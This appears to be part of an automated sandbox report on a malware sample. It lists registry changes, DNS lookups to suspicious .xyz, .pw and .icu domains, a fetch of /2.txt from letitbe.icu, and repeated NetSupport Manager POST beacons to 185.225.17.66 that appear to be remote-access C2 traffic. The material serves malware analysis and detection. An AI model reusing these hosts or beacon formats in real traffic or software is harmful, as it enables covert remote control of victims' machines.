- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\1C9308F0-8A41-4006-B814-D2F5B13BEDB5\\data"
- * Deleted Registry Keys:
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\OverrideProtocol_Object",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\updsvc.job",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\updsvc.job.fp"
- * DNS Communications:
- "type": "A",
- "request": "gidjshrvz.xyz",
- "answers":
- "data": "",
- "type": "NXDOMAIN"
- "type": "A",
- "request": "pofasfafha.xyz",
- "answers":
- "data": "185.225.17.169",
- "type": "A"
- "type": "A",
- "request": "apps.identrust.com",
- "answers":
- "data": "192.35.177.64",
- "type": "A"
- "data": "apps.digsigtrust.com",
- "type": "CNAME"
- "type": "A",
- "request": "fdguyt5ggs.pw",
- "answers":
- "data": "",
- "type": "NXDOMAIN"
- "type": "A",
- "request": "letitbe.icu",
- "answers":
- "data": "185.225.17.169",
- "type": "A"
- "type": "A",
- "request": "geo.netsupportsoftware.com",
- "answers":
- "data": "62.172.138.35",
- "type": "A"
- "data": "geograph.netsupportsoftware.com",
- "type": "CNAME"
- "data": "195.171.92.116",
- "type": "A"
- * Domains:
- "ip": "",
- "domain": "fdguyt5ggs.pw"
- "ip": "185.225.17.169",
- "domain": "pofasfafha.xyz"
- "ip": "192.35.177.64",
- "domain": "apps.identrust.com"
- "ip": "",
- "domain": "gidjshrvz.xyz"
- "ip": "62.172.138.35",
- "domain": "geo.netsupportsoftware.com"
- "ip": "185.225.17.169",
- "domain": "letitbe.icu"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://apps.identrust.com/roots/dstrootcax3.p7c",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "apps.identrust.com",
- "version": "1.1",
- "path": "/roots/dstrootcax3.p7c",
- "data": "GET /roots/dstrootcax3.p7c HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: apps.identrust.com\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "www.download.windowsupdate.com",
- "version": "1.1",
- "path": "/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
- "data": "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\r\nCache-Control: max-age = 89965\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: www.download.windowsupdate.com\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://letitbe.icu/2.txt",
- "user-agent": "Embarcadero URI Client/1.0",
- "method": "GET",
- "host": "letitbe.icu",
- "version": "1.1",
- "path": "/2.txt",
- "data": "GET /2.txt HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Embarcadero URI Client/1.0\r\nHost: letitbe.icu\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "CMD=POLL\nINFO=1\nACK=1\n",
- "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "185.225.17.66",
- "version": "1.1",
- "path": "http://185.225.17.66/fakeurl.htm",
- "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 22\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=POLL\nINFO=1\nACK=1\n",
- "port": 443
- "count": 1,
- "body": "CMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\xb0\\xf6\\x8f\\xe1P\\x99\\xdb\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 \\xca4\\xfd\\xe4\\x83\\xcc\\xa9\\xcb\\xa8 \\x1d\\x9c\\x01-\\x8amc\\x97\\xc1\\x10K\\xcb)\\xf2\\x17\\x97\\x08\\xe66\\x85\\x0f\\xfa)\\xff\\x819\\x0f<\\xcf\\x01\\xea\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
- "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "185.225.17.66",
- "version": "1.1",
- "path": "http://185.225.17.66/fakeurl.htm",
- "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 232\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\xb0\\xf6\\x8f\\xe1P\\x99\\xdb\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 \\xca4\\xfd\\xe4\\x83\\xcc\\xa9\\xcb\\xa8 \\x1d\\x9c\\x01-\\x8amc\\x97\\xc1\\x10K\\xcb)\\xf2\\x17\\x97\\x08\\xe66\\x85\\x0f\\xfa)\\xff\\x819\\x0f<\\xcf\\x01\\xea\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
- "port": 443
- "count": 1,
- "body": "",
- "uri": "http://geo.netsupportsoftware.com/location/loca.asp",
- "user-agent": "",
- "method": "GET",
- "host": "geo.netsupportsoftware.com",
- "version": "1.1",
- "path": "/location/loca.asp",
- "data": "GET /location/loca.asp HTTP/1.1\r\nHost: geo.netsupportsoftware.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "CMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
- "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "185.225.17.66",
- "version": "1.1",
- "path": "http://185.225.17.66/fakeurl.htm",
- "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 78\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
- "port": 443
- "count": 4,
- "body": "CMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
- "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "185.225.17.66",
- "version": "1.1",
- "path": "http://185.225.17.66/fakeurl.htm",
- "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 36\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
- "port": 443
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC: